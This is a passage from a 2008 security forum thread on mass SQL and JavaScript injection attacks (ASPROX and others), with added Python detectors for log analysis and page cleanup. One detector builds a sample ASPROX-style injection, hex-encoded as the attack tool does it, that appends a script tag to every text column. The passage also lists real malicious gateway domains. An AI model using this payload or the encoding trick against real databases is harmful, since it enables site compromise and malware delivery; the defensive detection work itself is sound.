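# and a later successful 'sa' login from the same client.
SAMPLE_ERRORLOG = """\
2008-09-17 10:00:01.10 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:00:01.10 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2008-09-17 10:00:01.35 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:00:01.35 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2008-09-17 10:00:01.60 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:00:01.60 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2008-09-17 10:00:01.90 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:00:01.90 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2008-09-17 10:00:02.20 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:00:02.20 Logon       Login failed for user 'sa'. [CLIENT: 192.0.2.77]
2008-09-17 10:03:15.00 Logon       Error: 18456, Severity: 14, State: 8.
2008-09-17 10:03:15.00 Logon       Login failed for user 'reportuser'. [CLIENT: 192.0.2.10]
2008-09-17 10:04:00.00 Logon       Login succeeded for user 'sa'. Connection made using SQL Server authentication. [CLIENT: 192.0.2.77]
"""

FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)
SUCCESS_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})\.\d+\s+Logon\s+"
    r"Login succeeded for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]"
)


def parse_events(log_text):
    """Yield (timestamp, 'fail'|'success', user, client_ip) from ERRORLOG text."""
    for line in log_text.splitlines():
        for kind, rx in (("fail", FAIL_RE), ("success", SUCCESS_RE)):
            m = rx.match(line)
            if m:
                ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
                yield ts, kind, m.group("user"), m.group("ip")
                break


def find_bruteforce(log_text, user="sa", threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: {"failures": n, "success_after": bool}} for every client
    that failed `threshold` or more logins as `user` inside some sliding `window`.
    A rapid series of failures for 'sa' from one address is the pattern that
    weak-password guessing against the administrator account produces."""
    fails = defaultdict(list)
    successes = defaultdict(list)
    for ts, kind, u, ip in parse_events(log_text):
        if u != user:
            continue
        (fails if kind == "fail" else successes)[ip].append(ts)
    hits = {}
    for ip, times in fails.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                # a guess that later works is the worst case, so record it
                later_success = any(t >= times[end] for t in successes.get(ip, []))
                hits[ip] = {"failures": len(times), "success_after": later_success}
                break
    return hits


if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_ERRORLOG).items():
        print(ip, info)
```

The "Error: 18456, Severity: 14, State: 8." lines are deliberately ignored: the state code is useful for diagnosis, but the line that carries the login name and client address is the one worth counting. Apply the same check to whatever collects your ERRORLOG (or the Windows application log), and pair it with the post's advice: the scan the Trojan performs only succeeds where 'sa' is reachable from the network with a guessable password.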

#46 AplusWebMaster


Posted 29 September 2008 - 06:03 AM

FYI...

ASPROX mutant
- http://isc.sans.org/...ml?storyid=5092
Last Updated: 2008-09-29 10:22:25 UTC - "...ongoing SQL injections... The injection itself (starting with DECLARE...) looks a lot like the technique used by ASPROX (see our earlier diary*), but that the injection attempt here is made not via the URL but rather via a cookie is a new twist... in the end delivers a file called "x.exe" that looks like yet another password stealer, but has poor detection at this time (Virustotal**)..."
* http://isc.sans.org/...ml?storyid=4565

** http://www.virustota...41d7ae62c126fff

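
Added example (not code from the ISC diary or from this thread): the ASPROX-style injection the diary refers to wraps its real statement in hex, CAST(0x... AS VARCHAR), so that the word DECLARE is the only readable part of the request. The script below decodes that wrapper from web server log lines whether it arrives in the query string or, as in the cookie twist described above, in the Cookie header, and scores the decoded text for the markers of the cursor loop that appends a script tag to every text column. The log lines, the stand-in inner statement and the example.invalid script host are constructed so the block runs offline.

```python
"""Decode hex-wrapped T-SQL (the ASPROX 'DECLARE ... CAST(0x... AS VARCHAR)' trick)
found in web request logs, whether it arrives in the query string or in a cookie.

Added example, not code from the ISC diary or the forum post. Log lines are
constructed; the embedded hex is produced from a stand-in statement so the block
runs offline. Percent-decoding is applied first because the injection normally
reaches the server URL-encoded.
"""
import re
from urllib.parse import unquote_plus

# Inner statement the hex wrapper hides: the shape of the ASPROX cursor loop
# (walk sysobjects/syscolumns, append a <script> tag to every text column).
# The script host is a placeholder, not a real site.
INNER_PAYLOAD = (
    "DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
    "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and "
    "a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor ... UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),"
    "['+@C+']))+'<script src=http://example.invalid/x.js></script>' ..."
)


def hex_wrap(statement, nvarchar=False):
    """Wrap a statement the way the attack tool does: hex-encode it and hand it to EXEC."""
    data = statement.encode("utf-16-le" if nvarchar else "latin-1")
    typ = "NVARCHAR" if nvarchar else "VARCHAR"
    return f";DECLARE @S {typ}(4000);SET @S=CAST(0x{data.hex()} AS {typ}(4000));EXEC(@S);--"


# Constructed log lines: combined log format with the Cookie header as a final field.
SAMPLE_LOG = [
    # 1) classic: payload appended to a numeric query parameter
    '203.0.113.5 - - [29/Sep/2008:10:22:25 +0000] "GET /news.asp?id=12'
    + hex_wrap(INNER_PAYLOAD).replace(" ", "%20")
    + ' HTTP/1.1" 200 5120 "-" "Mozilla/4.0" "-"',
    # 2) the twist from the diary: same wrapper carried in a cookie, NVARCHAR variant
    '203.0.113.6 - - [29/Sep/2008:10:23:01 +0000] "GET /default.asp HTTP/1.1" 200 3000 "-" "Mozilla/4.0" '
    + '"ASPSESSIONID=ABC123; lang=en' + hex_wrap(INNER_PAYLOAD, nvarchar=True) + '"',
    # 3) benign request
    '203.0.113.7 - - [29/Sep/2008:10:23:40 +0000] "GET /news.asp?id=13 HTTP/1.1" 200 5100 "-" "Mozilla/4.0" "lang=en"',
]

HEX_RE = re.compile(r"CAST\(0x((?:[0-9A-Fa-f]{2}){8,})\s+AS\s+(N?)(?:VAR)?CHAR", re.IGNORECASE)
MARKERS = ("DECLARE", "CURSOR", "SYSOBJECTS", "UPDATE", "<SCRIPT")


def decode_hex_sql(line):
    """Return the statements hidden in CAST(0x... AS [N]VARCHAR) wrappers on one log line."""
    text = unquote_plus(line)
    out = []
    for hexdata, n_prefix in HEX_RE.findall(text):
        raw = bytes.fromhex(hexdata)
        # N prefix means NVARCHAR, i.e. UTF-16LE; otherwise single-byte text
        out.append(raw.decode("utf-16-le" if n_prefix else "latin-1", errors="replace"))
    return out


def classify(line):
    """Return (decoded_payloads, is_asprox_like). A hit needs several markers at once,
    so a lone hex blob in a cookie does not trigger by itself."""
    decoded = decode_hex_sql(line)
    score = max((sum(m in d.upper() for m in MARKERS) for d in decoded), default=0)
    return decoded, score >= 3


def scan(lines):
    """Return the indexes of log lines carrying an ASPROX-style injection."""
    return [i for i, ln in enumerate(lines) if classify(ln)[1]]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOG):
        print(i, classify(SAMPLE_LOG[i])[0][0][:60], "...")
```

The decoder is what makes the cookie variant visible: a filter that only inspects the query string, or only looks for readable SQL keywords, sees nothing but a hex string in the Cookie field. Logging the Cookie header is therefore a precondition for spotting this at all.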

#47 AplusWebMaster


Posted 14 October 2008 - 12:06 PM

FYI...

China Business Network Rail Site Infected with Mass Script Injection
- http://securitylabs....lerts/3207.aspx
10.14.2008 - "Websense... discovered today that the China Business Network Rail Web site has been infected with the mass attack JavaScript injection to deliver a malicious payload. The reporting page on the site contains partially obfuscated malicious JavaScript code that, through numerous redirects, loads numerous exploits. Applications targeted include a GLWorld ActiveX Control, Real Player, a UUSE P2P streaming application, and Xulnei Thunder DapPlayer... Websense ThreatSeeker has been tracking how such attacks prevail over reputed Business-to-Business (B2B) and Business-to-Clients (B2C) Web sites to target their peers and other visitors..."

(Screenshots available at the URL above.)


#48 AplusWebMaster


Posted 17 October 2008 - 09:32 AM

FYI...

Adobe site - SQL injected...
- http://www.sophos.co...08/10/1863.html
16 October 2008 - "At the end of last week SophosLabs discovered that Adobe’s website was linking to a site infected with Mal/Badsrc-C. The infection had been encountered by a business partner of ours... Digging deeper, we discovered that the infected site was actually now part of the Adobe empire following an acquisition in October 2006. Some of the infected webpages have subsequently been rebranded but the underlying databases serving the site are still riddled with infections... The threat from web-based malware is increasing by the day and the fact that it can happen to companies as large as Adobe should make all web admins sit up and take notice.
NOTE/update: Last night Adobe contacted us and indicated that the issue had been resolved. I can confirm that the issue has been resolved."
- http://www.theregist...ked_abobe_page/

(Screenshot available at both URLs above.)


#49 AplusWebMaster


Posted 04 November 2008 - 06:22 PM

FYI...

ECPAT NZ INC Courtesy Site: Mass Injection
- http://securitylabs....lerts/3227.aspx
11.04.2008 - "Websense... has discovered that an ECPAT NZ INC courtesy site is infected with a mass JavaScript injection that delivers a malicious payload. Multiple pages on the site have been mass injected attempting to deliver malicious payloads from 20 different hosts. ECPAT is a global network of organizations and individuals working together for the elimination of child prostitution, child pornography, and the trafficking of children for sexual purposes. ECPAT NZ plays a key role in liaising and bringing about cooperation between key government and sector groups involved in the areas of commercial sexual exploitation of children (CSEC). In an effort to protect their visitors, Websense Security Labs is working closely with ECPAT NZ INC to advise on the threats on their Web site. The ThreatSeeker Network has been tracking how such attacks prevail over reputed and significant Web sites, targeting their peers and other visitors..."

(Screenshots available at the URL above.)


#50 AplusWebMaster


Posted 08 November 2008 - 03:41 PM

FYI...

- http://www.viruslist...logid=208187604
November 07, 2008 | 16:31 GMT - "...onset of the latest mass hack attack – websites being hacked and links placed on them that lead to malicious servers. We’re estimating that in the last two days alone, between 2000 and 10,000 servers, mainly Western European and American ones, have been hacked. It’s not yet clear who’s doing this... We’re still working on determining exactly how the sites were hacked, but there are two scenarios which are the most likely – using SQL injection or using accounts to the sites which had already been stolen. One common factor is that the majority of the hacked sites run on some type of ASP engine... The attackers add a tag, <script src=http://******/h.js>, to the html of hacked sites. The link leads to JavaScript located on one of six servers – these servers act as gateways for further redirecting of requests. We’ve identified six of these gateways and they’ve been added to the blacklist in our antivirus:
* armsart.com
* acglgoa.com
* idea21.org
* yrwap.cn
* s4d.in
* dbios.org
If you’re an admin, you should block access to these sites..."

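
Added example (not code from the Kaspersky post or from this thread): blocking the six gateways at the perimeter protects your users, but an admin also needs to find the pages on their own site that already carry the injected tag. The script below parses HTML, collects the src of every script tag (the injected one is written with an unquoted src, exactly as quoted in the post), and reports those on a listed gateway or any subdomain of one, plus any other third-party script hosts for review. Only the six domains come from the post; the sample page is constructed.

```python
"""Find <script src=...> tags in stored page content that point at the gateway hosts
listed in the Kaspersky post, so an admin can locate injected pages in a database
dump or a crawl of their own site.

Added example, not code from the Kaspersky post. The HTML below is constructed;
only the six gateway domains come from the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

GATEWAYS = {"armsart.com", "acglgoa.com", "idea21.org", "yrwap.cn", "s4d.in", "dbios.org"}

# Constructed sample page: one legitimate same-origin script, one injected gateway
# reference written the way the post describes it (unquoted src, tacked on at the end).
SAMPLE_HTML = """<html><head><title>Widgets Inc</title>
<script src="/js/site.js"></script></head>
<body><h1>Welcome</h1><p>Product list</p></body></html>
<script src=http://armsart.com/h.js></script>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag, quoted or not."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.sources.append(value)


def script_sources(html_text):
    """All script src values in document order."""
    p = ScriptSrcCollector()
    p.feed(html_text)
    p.close()
    return p.sources


def host_of(src):
    """Hostname of an absolute (or protocol-relative) script URL; '' for relative paths."""
    return (urlsplit(src).hostname or "").lower()


def matches_gateway(host, gateways=GATEWAYS):
    """True for a listed gateway or any subdomain of one (not for look-alike suffixes)."""
    return any(host == g or host.endswith("." + g) for g in gateways)


def find_injected_scripts(html_text, gateways=GATEWAYS):
    """Return (gateway_hits, other_external): script URLs on a listed gateway, and the
    remaining third-party script hosts an admin should look at by hand."""
    hits, external = [], []
    for src in script_sources(html_text):
        host = host_of(src)
        if not host:
            continue  # same-origin relative path
        if matches_gateway(host, gateways):
            hits.append(src)
        else:
            external.append(host)
    return hits, sorted(set(external))


if __name__ == "__main__":
    print(find_injected_scripts(SAMPLE_HTML))
```

Run it over the text columns of the site's database as well as over crawled pages: on ASP sites compromised through SQL injection the tag lives in the database rows, and cleaning the rendered page alone leaves it to come back on the next request.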
